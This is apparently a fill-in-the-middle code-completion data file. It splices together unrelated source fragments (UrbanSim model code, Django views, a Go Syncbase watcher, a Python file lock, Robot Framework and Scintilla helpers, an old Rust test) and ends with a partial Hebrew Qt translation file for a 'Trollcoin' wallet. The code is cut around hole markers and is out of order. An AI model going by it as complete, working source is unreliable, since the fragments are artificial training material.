# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.models.building_location_choice_model import BuildingLocationChoiceModel as UrbansimBuildingLocationChoiceModel
from numpy import where, arange, zeros
from numpy import logical_or, logical_not
from opus_core.variables.variable_name import VariableName
from opus_core.resources import Resources
from opus_core.datasets.dataset import Dataset
class BuildingLocationChoiceModel(UrbansimBuildingLocationChoiceModel):
# def get_weights_for_sampling_locations(self, agent_set, agents_index, data_objects=None):
# where_developable = where(self.apply_filter(self.filter, None, agent_set, agents_index, data_objects=data_objects))[0]
# weight_array = ones((where_developable.size), dtype=int8) #.astype(bool8)
# return (weight_array, where_developable)
def get_weights_for_sampling_locations_for_estimation(self, agent_set, agents_index):
if self.run_config.get("agent_units_string", None): # needs to be corrected
agent_set.compute_variables(self.run_config["agent_units_string"], dataset_pool=self.dataset_pool)
return self.get_weights_for_sampling_locations(agent_set, agents_index)
def prepare_for_estimate(self, add_member_prefix=True,
specification_dict=None,
specification_storage=None,
specification_table=None,
building_set=None,
buildings_for_estimation_storage=None,
buildings_for_estimation_table=None,
constants=None, base_year=0,
building_categories=None,
location_id_variable=None,
join_datasets=False,
data_objects=None, **kwargs):
<|fim▁hole|> if location_id_variable is not None:
building_set.compute_variables(location_id_variable, resources=Resources(data_objects))
# create agents for estimation
if buildings_for_estimation_storage is not None:
estimation_set = Dataset(in_storage=buildings_for_estimation_storage,
in_table_name=buildings_for_estimation_table,
id_name=building_set.get_id_name(),
dataset_name=building_set.get_dataset_name())
if location_id_variable:
estimation_set.compute_variables(location_id_variable,
resources=Resources(data_objects))
# needs to be a primary attribute because of the join method below
estimation_set.add_primary_attribute(estimation_set.get_attribute(location_id_variable),
VariableName(location_id_variable).alias())
years = estimation_set.get_attribute("scheduled_year")
recent_years = constants['recent_years']
indicator = zeros(estimation_set.size(), dtype="int32")
for year in range(base_year-recent_years, base_year+1):
indicator = logical_or(indicator, years==year)
idx = where(logical_not(indicator))[0]
estimation_set.remove_elements(idx)
#if filter:
#estimation_set.compute_variables(filter, resources=Resources(data_objects))
#index = where(estimation_set.get_attribute(filter) > 0)[0]
#estimation_set.subset_by_index(index, flush_attributes_if_not_loaded=False)
if join_datasets:
building_set.join_by_rows(estimation_set,
require_all_attributes=False,
change_ids_if_not_unique=True)
index = arange(building_set.size()-estimation_set.size(), building_set.size())
else:
index = building_set.get_id_index(estimation_set.get_id_attribute())
else:
if building_set is not None:
index = arange(building_set.size())
else:
index = None
if add_member_prefix:
specification_table = self.group_member.add_member_prefix_to_table_names([specification_table])
from opus_core.model import get_specification_for_estimation
#from urbansim.functions import compute_supply_and_add_to_location_set
specification = get_specification_for_estimation(specification_dict,
specification_storage,
specification_table)
#specification, dummy = AgentLocationChoiceModelMember.prepare_for_estimate(self, add_member_prefix,
#specification_dict, specification_storage,
#specification_table,
#location_id_variable=location_id_variable,
#data_objects=data_objects, **kwargs)
return (specification, index)<|fim▁end|>
|
# buildings = None
if (building_set is not None):
|
<|file_name|>noBlankLinesAfterLocalImports_after.py<|end_file_name|><|fim▁begin|>from pprint import pprint
VAR = 42
<|fim▁hole|>
class C:
from textwrap import dedent
pass
import codecs as C
pass<|fim▁end|>
|
def foo():
import sys
import ast, tokenize
pass
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.contrib import messages
from django.db.models import Q
from django.http import Http404
from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
# Create your views here.
from .forms import VariationInventoryFormSet
from .mixins import StaffRequiredMixin
from .models import Product, Variation, Category
class CategoryListView(ListView):
model = Category
queryset = Category.objects.all()
template_name = "products/product_list.html"
class CategoryDetailView(DetailView):
model = Category
def get_context_data(self, *args, **kwargs):
context = super(CategoryDetailView, self).get_context_data(*args, **kwargs)
obj = self.get_object()
product_set = obj.product_set.all()
default_products = obj.default_category.all()
products = ( product_set | default_products ).distinct()
context["products"] = products
return context
class VariationListView(StaffRequiredMixin, ListView):
model = Variation
queryset = Variation.objects.all()
def get_context_data(self, *args, **kwargs):
context = super(VariationListView, self).get_context_data(*args, **kwargs)
context["formset"] = VariationInventoryFormSet(queryset=self.get_queryset())
return context
def get_queryset(self, *args, **kwargs):
product_pk = self.kwargs.get("pk")
if product_pk:
product = get_object_or_404(Product, pk=product_pk)
queryset = Variation.objects.filter(product=product)
return queryset<|fim▁hole|> formset.save(commit=False)
for form in formset:
new_item = form.save(commit=False)
#if new_item.title:
product_pk = self.kwargs.get("pk")
product = get_object_or_404(Product, pk=product_pk)
new_item.product = product
new_item.save()
messages.success(request, "Your inventory and pricing has been updated.")
return redirect("products")
raise Http404
class ProductListView(ListView):
model = Product
queryset = Product.objects.all()
def get_context_data(self, *args, **kwargs):
context = super(ProductListView, self).get_context_data(*args, **kwargs)
context["now"] = timezone.now()
context["query"] = self.request.GET.get("q") #None
return context
def get_queryset(self, *args, **kwargs):
qs = super(ProductListView, self).get_queryset(*args, **kwargs)
query = self.request.GET.get("q")
if query:
qs = self.model.objects.filter(
Q(title__icontains=query) |
Q(description__icontains=query)
)
try:
qs2 = self.model.objects.filter(
Q(price=query)
)
qs = (qs | qs2).distinct()
except:
pass
return qs
import random
class ProductDetailView(DetailView):
model = Product
#template_name = "product.html"
#template_name = "<appname>/<modelname>_detail.html"
def get_context_data(self, *args, **kwargs):
context = super(ProductDetailView, self).get_context_data(*args, **kwargs)
instance = self.get_object()
#order_by("-title")
context["related"] = sorted(Product.objects.get_related(instance)[:6], key= lambda x: random.random())
return context
def product_detail_view_func(request, id):
#product_instance = Product.objects.get(id=id)
product_instance = get_object_or_404(Product, id=id)
try:
product_instance = Product.objects.get(id=id)
except Product.DoesNotExist:
raise Http404
except:
raise Http404
template = "products/product_detail.html"
context = {
"object": product_instance
}
return render(request, template, context)<|fim▁end|>
|
def post(self, request, *args, **kwargs):
formset = VariationInventoryFormSet(request.POST, request.FILES)
if formset.is_valid():
|
<|file_name|>watcher.go<|end_file_name|><|fim▁begin|>// Copyright 2016 The Vanadium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package client
import (
"strings"
"sync"
"v.io/v23/context"
wire "v.io/v23/services/syncbase"
"v.io/v23/services/watch"
"v.io/v23/syncbase"
"v.io/v23/syncbase/util"
"v.io/v23/verror"
"v.io/x/ref/services/syncbase/longevity_tests/model"
)
// Watcher is a client that watches a range of keys in a set of database collections.
type Watcher struct {
// Prefix to watch. Defaults to empty string.
// TODO(nlacasse): Allow different prefixes per collection?
Prefix string
// ResumeMarker to begin watching from.
// TODO(nlacasse): Allow different ResumeMarkers per collection?
ResumeMarker watch.ResumeMarker
// OnChange runs for each WatchChange. Must be goroutine-safe. By default
// this will be a no-op.
OnChange func(syncbase.WatchChange)
ctx *context.T
// Map of databases and their respective collections.
dbColMap map[syncbase.Database][]syncbase.Collection
stopChan chan struct{}
err error
errMu sync.Mutex
// wg waits until all spawned goroutines stop.
wg sync.WaitGroup
}
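// Minimal usage sketch (names illustrative; assumes ctx and dbModels are set up):
//
//   w := &Watcher{
//       Prefix:   "foo",
//       OnChange: func(c syncbase.WatchChange) { /* inspect c */ },
//   }
//   w.Start(ctx, "my-syncbase", dbModels)
//   // ... let it run ...
//   err := w.Stop()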
var _ Client = (*Watcher)(nil)
func (w *Watcher) String() string {
dbNames := []string{}
for db := range w.dbColMap {
dbNames = append(dbNames, db.Id().Name)
}
return strings.Join(append([]string{"Watcher"}, dbNames...), "-")
}
func (w *Watcher) Start(ctx *context.T, sbName string, dbModels model.DatabaseSet) {
w.ctx = ctx
w.err = nil
w.stopChan = make(chan struct{})
w.wg.Add(1)
go func() {
defer w.wg.Done()
var err error
w.dbColMap, _, err = CreateDbsAndCollections(ctx, sbName, dbModels)
if err != nil {
w.setError(err)
return
}
for db, colSlice := range w.dbColMap {
for _, col := range colSlice {
// Create a watch stream for the collection.
// TODO(ivanpi): Simplify now that Watch can span collections.
stream := db.Watch(ctx, w.ResumeMarker, []wire.CollectionRowPattern{
util.RowPrefixPattern(col.Id(), w.Prefix),
})
defer stream.Cancel()
// Spawn a goroutine to repeatedly call stream.Advance() and
// process any changes.
w.wg.Add(1)
go func() {
defer w.wg.Done()
for {
advance := stream.Advance()
if !advance {
if err := stream.Err(); err != nil && verror.ErrorID(err) != verror.ErrCanceled.ID {
w.setError(err)
}
return<|fim▁hole|> w.OnChange(change)
}
}
}()
}
}
// Wait for stopChan to close.
<-w.stopChan
}()
}
func (w *Watcher) Stop() error {
close(w.stopChan)
w.wg.Wait()
return w.err
}
func (w *Watcher) setError(err error) {
w.errMu.Lock()
defer w.errMu.Unlock()
if err != nil && w.err == nil {
w.err = err
}
}<|fim▁end|>
|
}
change := stream.Change()
if w.OnChange != nil {
|
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>import os
import errno
import fcntl
from contextlib import contextmanager
from time import time, sleep
@contextmanager
def wlock(filename, retry_interval=0.05):
# returns: write, exists, fd
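    # Locking protocol, as implemented below:
    #   - file exists, exclusive flock acquired   -> yield (True, True, fd)   (writer)
    #   - file exists, only a shared flock works  -> yield (False, True, fd)  (reader)
    #   - file missing -> create it, poll for the exclusive lock, yield
    #     (True, False, fd), and unlink the file afterwards if it stayed empty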
try:
with open(filename, 'rb+') as lock:
try:
fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
while True:
try:
fcntl.flock(lock, fcntl.LOCK_SH | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
sleep(retry_interval)
continue
else:<|fim▁hole|> else:
raise
else:
yield True, True, lock
except IOError as exc:
if exc.errno == errno.ENOENT:
with open(filename, 'wb') as lock:
while True:
try:
fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as exc:
if exc.errno == errno.EAGAIN:
sleep(retry_interval)
continue
else:
raise
else:
yield True, False, lock
if os.path.exists(filename):
if not lock.closed:
lock.seek(0, 2)
if not lock.tell():
os.unlink(filename)
elif not os.path.getsize(filename):
os.unlink(filename)
break
else:
raise
class Timer:
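    # usage sketch: t = Timer(); ...; str(t) -> wall time since creation, e.g. "12.345 ms"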
def __init__(self):
self.start = time()
def __str__(self):
return '%.3f ms' % ((time() - self.start) * 1000)<|fim▁end|>
|
raise
else:
yield False, True, lock
break
|
<|file_name|>XiteQt.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import ctypes, os, sys, unittest
from PySide.QtCore import *
from PySide.QtGui import *
import ScintillaCallable
sys.path.append("..")
from bin import ScintillaEditPy
scintillaDirectory = ".."
scintillaIncludeDirectory = os.path.join(scintillaDirectory, "include")
sys.path.append(scintillaIncludeDirectory)
import Face
class Form(QDialog):
def __init__(self, parent=None):
super(Form, self).__init__(parent)
self.resize(460,300)
# Create widget
self.edit = ScintillaEditPy.ScintillaEdit(self)
class XiteWin():
def __init__(self, test=""):
self.face = Face.Face()
self.face.ReadFromFile(os.path.join(scintillaIncludeDirectory, "Scintilla.iface"))
self.test = test
self.form = Form()
scifn = self.form.edit.send(int(self.face.features["GetDirectFunction"]["Value"]), 0, 0)
sciptr = ctypes.c_char_p(self.form.edit.send(
int(self.face.features["GetDirectPointer"]["Value"]), 0,0))
self.ed = ScintillaCallable.ScintillaCallable(self.face, scifn, sciptr)
self.form.show()
def DoStuff(self):
print(self.test)
self.CmdTest()
def DoEvents(self):
QApplication.processEvents()
def CmdTest(self):
runner = unittest.TextTestRunner()
tests = unittest.defaultTestLoader.loadTestsFromName(self.test)
results = runner.run(tests)
print(results)
sys.exit(0)
xiteFrame = None
def main(test):
global xiteFrame
app = QApplication(sys.argv)
xiteFrame = XiteWin(test)
xiteFrame.DoStuff()
<|fim▁hole|><|fim▁end|>
|
sys.exit(app.exec_())
|
<|file_name|>_screenshot.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import os
import robot
from keywordgroup import KeywordGroup
class _ScreenshotKeywords(KeywordGroup):
def __init__(self):
self._screenshot_index = 0
# Public
def capture_page_screenshot(self, filename=None):
"""Takes a screenshot of the current page and embeds it into the log.
`filename` argument specifies the name of the file to write the
screenshot into. If no `filename` is given, the screenshot is saved into file
`appium-screenshot-<counter>.png` under the directory where
the Robot Framework log file is written into. The `filename` is
also considered relative to the same directory, if it is not
given in absolute format.
"""
path, link = self._get_screenshot_paths(filename)
if hasattr(self._current_application(), 'get_screenshot_as_file'):
self._current_application().get_screenshot_as_file(path)
else:
self._current_application().save_screenshot(path)
# Image is shown on its own row and thus prev row is closed on purpose
self._html('</td></tr><tr><td colspan="3"><a href="%s">'
'<img src="%s" width="800px"></a>' % (link, link))
# Private
def _get_screenshot_paths(self, filename):
if not filename:
self._screenshot_index += 1
filename = 'appium-screenshot-%d.png' % self._screenshot_index
else:
filename = filename.replace('/', os.sep)
logdir = self._get_log_dir()
path = os.path.join(logdir, filename)
<|fim▁hole|> return path, link<|fim▁end|>
|
link = robot.utils.get_link_path(path, logdir)
|
<|file_name|>uniq-cc-generic.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use std::ptr;
enum maybe_pointy {
none,
p(@mut Pointy),
}
struct Pointy {
a : maybe_pointy,
d : ~fn() -> uint,
}<|fim▁hole|>
fn make_uniq_closure<A:Send>(a: A) -> ~fn() -> uint {
let result: ~fn() -> uint = || ptr::to_unsafe_ptr(&a) as uint;
result
}
fn empty_pointy() -> @mut Pointy {
return @mut Pointy {
a : none,
d : make_uniq_closure(~"hi")
}
}
pub fn main() {
let v = empty_pointy();
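    // tie the knot: `v` now refers back to itself through its `a` field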
v.a = p(v);
}<|fim▁end|>
| |
<|file_name|>bitcoin_he.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="he" version="2.0">
<defaultcodec>UTF-8</defaultcodec>
<context>
<name>AboutDialog</name>
<message>
<location filename="../forms/aboutdialog.ui" line="+14"/>
<source>About Trollcoin</source>
<translation>אודות לייטקוין</translation>
</message>
<message>
<location line="+39"/>
<source><b>Trollcoin</b> version</source>
<translation>גרסת <b>לייטקוין</b></translation>
</message>
<message>
<location line="+57"/>
<source>
This is experimental software.
Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php.
This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young (eay@cryptsoft.com) and UPnP software written by Thomas Bernard.</source>
<translation>
זוהי תוכנה ניסיונית.
מופצת תחת רישיון התוכנה MIT/X11, ראה את הקובץ המצורף COPYING או http://www.opensource.org/licenses/mit-license.php.
המוצר הזה כולל תוכנה שפותחה ע"י פרויקט OpenSSL לשימוש בתיבת הכלים OpenSSL (http://www.openssl.org/) ותוכנה קריפטוגרפית שנכתבה ע"י אריק יאנג (eay@cryptsoft.com) ותוכנת UPnP שנכתבה ע"י תומס ברנרד.</translation>
</message>
<message>
<location filename="../aboutdialog.cpp" line="+14"/>
<source>Copyright</source>
<translation>זכויות יוצרים</translation>
</message>
<message>
<location line="+0"/>
<source>The Trollcoin developers</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>AddressBookPage</name>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>Address Book</source>
<translation>פנקס כתובות</translation>
</message>
<message>
<location line="+19"/>
<source>Double-click to edit address or label</source>
<translation>לחץ לחיצה כפולה לערוך כתובת או תוית</translation>
</message>
<message>
<location line="+27"/>
<source>Create a new address</source>
<translation>יצירת כתובת חדשה</translation>
</message>
<message>
<location line="+14"/>
<source>Copy the currently selected address to the system clipboard</source>
<translation>העתק את הכתובת המסומנת ללוח העריכה</translation>
</message>
<message>
<location line="-11"/>
<source>&New Address</source>
<translation>כתובת חדשה</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="+63"/>
<source>These are your Trollcoin addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source>
<translation>אלה כתובת הלייטקוין שלך עבור קבלת תשלומים. ייתכן ותרצה לתת כתובת שונה לכל שולח כדי שתוכל לעקוב אחר מי משלם לך.</translation>
</message>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>&Copy Address</source>
<translation>העתק כתובת</translation>
</message>
<message>
<location line="+11"/>
<source>Show &QR Code</source>
<translation>הצג &קוד QR</translation>
</message>
<message>
<location line="+11"/>
<source>Sign a message to prove you own a Trollcoin address</source>
<translation>חתום על הודעה בכדי להוכיח כי אתה הבעלים של כתובת לייטקוין.</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+25"/>
<source>Delete the currently selected address from the list</source>
<translation>מחק את הכתובת שנבחרה מהרשימה</translation>
</message>
<message>
<location line="+27"/>
<source>Export the data in the current tab to a file</source>
<translation>יצוא הנתונים בטאב הנוכחי לקובץ</translation>
</message>
<message>
<location line="+3"/>
<source>&Export</source>
<translation type="unfinished"/>
</message>
<message>
<location line="-44"/>
<source>Verify a message to ensure it was signed with a specified Trollcoin address</source>
<translation>אמת הודעה בכדי להבטיח שהיא נחתמה עם כתובת לייטקוין מסוימת.</translation>
</message>
<message>
<location line="+3"/>
<source>&Verify Message</source>
<translation>אמת הודעה</translation>
</message>
<message>
<location line="+14"/>
<source>&Delete</source>
<translation>מחק</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="-5"/>
<source>These are your Trollcoin addresses for sending payments. Always check the amount and the receiving address before sending coins.</source>
<translation>אלה כתובת הלייטקוין שלך עבור שליחת תשלומים. תמיד בדוק את מספר ואת כתובות מקבלי התשלומים לפני שליחת מטבעות.</translation>
</message>
<message>
<location line="+13"/>
<source>Copy &Label</source>
<translation>העתק תוית</translation>
</message>
<message>
<location line="+1"/>
<source>&Edit</source>
<translation>עריכה</translation>
</message>
<message>
<location line="+1"/>
<source>Send &Coins</source>
<translation>שלח מטבעות</translation>
</message>
<message>
<location line="+260"/>
<source>Export Address Book Data</source>
<translation>יצוא נתוני פנקס כתובות</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>קובץ מופרד בפסיקים (*.csv)</translation>
</message>
<message>
<location line="+13"/>
<source>Error exporting</source>
<translation>שגיאה ביצוא</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>לא מסוגל לכתוב לקובץ %1.</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<location filename="../addresstablemodel.cpp" line="+144"/>
<source>Label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+36"/>
<source>(no label)</source>
<translation>(ללא תוית)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<location filename="../forms/askpassphrasedialog.ui" line="+26"/>
<source>Passphrase Dialog</source>
<translation>שיח סיסמא</translation>
</message>
<message>
<location line="+21"/>
<source>Enter passphrase</source>
<translation>הכנס סיסמא</translation>
</message>
<message>
<location line="+14"/>
<source>New passphrase</source>
<translation>סיסמה חדשה</translation>
</message>
<message>
<location line="+14"/>
<source>Repeat new passphrase</source>
<translation>חזור על הסיסמה החדשה</translation>
</message>
<message>
<location filename="../askpassphrasedialog.cpp" line="+33"/>
<source>Enter the new passphrase to the wallet.<br/>Please use a passphrase of <b>10 or more random characters</b>, or <b>eight or more words</b>.</source>
<translation>הכנס את הסיסמה החדשה לארנק. <br/>אנא השתמש בסיסמה המכילה <b>10 תוים אקראיים או יותר</b>, או <b>שמונה מילים או יותר</b>.</translation>
</message>
<message>
<location line="+1"/>
<source>Encrypt wallet</source>
<translation>הצפן ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>הפעולה הזו דורשת את סיסמת הארנק שלך בשביל לפתוח את הארנק.</translation>
</message>
<message>
<location line="+5"/>
<source>Unlock wallet</source>
<translation>פתיחת ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>הפעולה הזו דורשת את סיסמת הארנק שלך בשביל לפענח את הארנק.</translation>
</message>
<message>
<location line="+5"/>
<source>Decrypt wallet</source>
<translation>פענוח ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>Change passphrase</source>
<translation>שינוי סיסמה</translation>
</message>
<message>
<location line="+1"/>
<source>Enter the old and new passphrase to the wallet.</source>
<translation>הכנס את הסיסמות הישנה והחדשה לארנק.</translation>
</message>
<message>
<location line="+46"/>
<source>Confirm wallet encryption</source>
<translation>אשר הצפנת ארנק</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR TROLLCOINS</b>!</source>
        <translation>אזהרה: אם אתה מצפין את הארנק ומאבד את הסיסמה, אתה <b>תאבד את כל הטרולקוינים שלך</b>!</translation>
</message>
<message>
<location line="+0"/>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>האם אתה בטוח שברצונך להצפין את הארנק?</translation>
</message>
<message>
<location line="+15"/>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>חשוב! כל גיבוי קודם שעשית לארנק שלך יש להחליף עם קובץ הארנק המוצפן שזה עתה נוצר. מסיבות אבטחה, גיבויים קודמים של קובץ הארנק הלא-מוצפן יהפכו לחסרי שימוש ברגע שתתחיל להשתמש בארנק החדש המוצפן.</translation>
</message>
<message>
<location line="+100"/>
<location line="+24"/>
<source>Warning: The Caps Lock key is on!</source>
<translation>זהירות: מקש Caps Lock מופעל!</translation>
</message>
<message>
<location line="-130"/>
<location line="+58"/>
<source>Wallet encrypted</source>
<translation>הארנק הוצפן</translation>
</message>
<message>
<location line="-56"/>
<source>Trollcoin will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your trollcoins from being stolen by malware infecting your computer.</source>
        <translation>טרולקוין ייסגר עכשיו כדי להשלים את תהליך ההצפנה. זכור שהצפנת הארנק שלך אינה יכולה להגן באופן מלא על הטרולקוינים שלך מפני תוכנות זדוניות המושתלות על המחשב.</translation>
</message>
<message>
<location line="+13"/>
<location line="+7"/>
<location line="+42"/>
<location line="+6"/>
<source>Wallet encryption failed</source>
<translation>הצפנת הארנק נכשלה</translation>
</message>
<message>
<location line="-54"/>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>הצפנת הארנק נכשלה עקב שגיאה פנימית. הארנק שלך לא הוצפן.</translation>
</message>
<message>
<location line="+7"/>
<location line="+48"/>
<source>The supplied passphrases do not match.</source>
<translation>הסיסמות שניתנו אינן תואמות.</translation>
</message>
<message>
<location line="-37"/>
<source>Wallet unlock failed</source>
<translation>פתיחת הארנק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<location line="+11"/>
<location line="+19"/>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>הסיסמה שהוכנסה לפענוח הארנק שגויה.</translation>
</message>
<message>
<location line="-20"/>
<source>Wallet decryption failed</source>
<translation>פענוח הארנק נכשל</translation>
</message>
<message>
<location line="+14"/>
<source>Wallet passphrase was successfully changed.</source>
<translation>סיסמת הארנק שונתה בהצלחה.</translation>
</message>
</context>
<context>
<name>BitcoinGUI</name>
<message>
<location filename="../bitcoingui.cpp" line="+233"/>
<source>Sign &message...</source>
<translation>חתום על הודעה</translation>
</message>
<message>
<location line="+280"/>
<source>Synchronizing with network...</source>
<translation>מסתנכרן עם הרשת...</translation>
</message>
<message>
<location line="-349"/>
<source>&Overview</source>
<translation>&סקירה</translation>
</message>
<message>
<location line="+1"/>
<source>Show general overview of wallet</source>
<translation>הצג סקירה כללית של הארנק</translation>
</message>
<message>
<location line="+20"/>
<source>&Transactions</source>
<translation>&פעולות</translation>
</message>
<message>
<location line="+1"/>
<source>Browse transaction history</source>
<translation>דפדף בהיסטוריית הפעולות</translation>
</message>
<message>
<location line="+7"/>
<source>Edit the list of stored addresses and labels</source>
<translation>ערוך את רשימת הכתובות והתויות</translation>
</message>
<message>
<location line="-14"/>
<source>Show the list of addresses for receiving payments</source>
<translation>הצג את רשימת הכתובות לקבלת תשלומים</translation>
</message>
<message>
<location line="+31"/>
<source>E&xit</source>
<translation>י&ציאה</translation>
</message>
<message>
<location line="+1"/>
<source>Quit application</source>
<translation>סגור תוכנה</translation>
</message>
<message>
<location line="+4"/>
<source>Show information about Trollcoin</source>
        <translation>הצג מידע על טרולקוין</translation>
</message>
<message>
<location line="+2"/>
<source>About &Qt</source>
<translation>אודות Qt</translation>
</message>
<message>
<location line="+1"/>
<source>Show information about Qt</source>
<translation>הצג מידע על Qt</translation>
</message>
<message>
<location line="+2"/>
<source>&Options...</source>
<translation>&אפשרויות</translation>
</message>
<message>
<location line="+6"/>
<source>&Encrypt Wallet...</source>
<translation>הצפן ארנק</translation>
</message>
<message>
<location line="+3"/>
<source>&Backup Wallet...</source>
<translation>גיבוי ארנק</translation>
</message>
<message>
<location line="+2"/>
<source>&Change Passphrase...</source>
<translation>שנה סיסמא</translation>
</message>
<message>
<location line="+285"/>
<source>Importing blocks from disk...</source>
<translation>מייבא בלוקים מהדיסק...</translation>
</message>
<message>
<location line="+3"/>
<source>Reindexing blocks on disk...</source>
<translation>מחדש את אינדקס הבלוקים בדיסק...</translation>
</message>
<message>
<location line="-347"/>
<source>Send coins to a Trollcoin address</source>
        <translation>שלח מטבעות לכתובת טרולקוין</translation>
</message>
<message>
<location line="+49"/>
<source>Modify configuration options for Trollcoin</source>
        <translation>שנה אפשרויות תצורה עבור טרולקוין</translation>
</message>
<message>
<location line="+9"/>
<source>Backup wallet to another location</source>
<translation>גיבוי הארנק למקום אחר</translation>
</message>
<message>
<location line="+2"/>
<source>Change the passphrase used for wallet encryption</source>
<translation>שנה את הסיסמה להצפנת הארנק</translation>
</message>
<message>
<location line="+6"/>
<source>&Debug window</source>
<translation>חלון ניפוי</translation>
</message>
<message>
<location line="+1"/>
<source>Open debugging and diagnostic console</source>
<translation>פתח את לוח הבקרה לאבחון וניפוי</translation>
</message>
<message>
<location line="-4"/>
<source>&Verify message...</source>
<translation>אמת הודעה...</translation>
</message>
<message>
<location line="-165"/>
<location line="+530"/>
<source>Trollcoin</source>
        <translation>טרולקוין</translation>
</message>
<message>
<location line="-530"/>
<source>Wallet</source>
<translation>ארנק</translation>
</message>
<message>
<location line="+101"/>
<source>&Send</source>
        <translation>&שלח</translation>
</message>
<message>
<location line="+7"/>
<source>&Receive</source>
        <translation>&קבל</translation>
</message>
<message>
<location line="+14"/>
<source>&Addresses</source>
        <translation>&כתובות</translation>
</message>
<message>
<location line="+22"/>
<source>&About Trollcoin</source>
        <translation>אודות טרולקוין</translation>
</message>
<message>
<location line="+9"/>
<source>&Show / Hide</source>
<translation>הצג / הסתר</translation>
</message>
<message>
<location line="+1"/>
<source>Show or hide the main Window</source>
<translation>הצג או הסתר את החלון הראשי</translation>
</message>
<message>
<location line="+3"/>
<source>Encrypt the private keys that belong to your wallet</source>
<translation>הצפן את המפתחות הפרטיים ששייכים לארנק שלך</translation>
</message>
<message>
<location line="+7"/>
<source>Sign messages with your Trollcoin addresses to prove you own them</source>
        <translation>חתום על הודעות עם כתובות הטרולקוין שלך כדי להוכיח שהן בבעלותך</translation>
</message>
<message>
<location line="+2"/>
<source>Verify messages to ensure they were signed with specified Trollcoin addresses</source>
        <translation>אמת הודעות כדי להבטיח שהן נחתמו עם כתובות טרולקוין מסוימות</translation>
</message>
<message>
<location line="+28"/>
<source>&File</source>
<translation>&קובץ</translation>
</message>
<message>
<location line="+7"/>
<source>&Settings</source>
<translation>ה&גדרות</translation>
</message>
<message>
<location line="+6"/>
<source>&Help</source>
<translation>&עזרה</translation>
</message>
<message>
<location line="+9"/>
<source>Tabs toolbar</source>
        <translation>סרגל כלים של טאבים</translation>
</message>
<message>
<location line="+17"/>
<location line="+10"/>
<source>[testnet]</source>
<translation>[רשת-בדיקה]</translation>
</message>
<message>
<location line="+47"/>
<source>Trollcoin client</source>
        <translation>תוכנת טרולקוין</translation>
</message>
<message numerus="yes">
<location line="+141"/>
<source>%n active connection(s) to Trollcoin network</source>
        <translation><numerusform>חיבור פעיל אחד לרשת הטרולקוין</numerusform><numerusform>%n חיבורים פעילים לרשת הטרולקוין</numerusform></translation>
</message>
<message>
<location line="+22"/>
<source>No block source available...</source>
        <translation>אין מקור בלוקים זמין...</translation>
</message>
<message>
<location line="+12"/>
<source>Processed %1 of %2 (estimated) blocks of transaction history.</source>
        <translation>עובדו %1 מתוך %2 (משוער) בלוקים של היסטוריית הפעולות.</translation>
</message>
<message>
<location line="+4"/>
<source>Processed %1 blocks of transaction history.</source>
<translation>הושלם עיבוד של %1 בלוקים של היסטוריית פעולות.</translation>
</message>
<message numerus="yes">
<location line="+20"/>
<source>%n hour(s)</source>
<translation><numerusform>%n שעה</numerusform><numerusform>%n שעות</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s)</source>
<translation><numerusform>%n יום</numerusform><numerusform>%n ימים</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n week(s)</source>
<translation><numerusform>%n שבוע</numerusform><numerusform>%n שבועות</numerusform></translation>
</message>
<message>
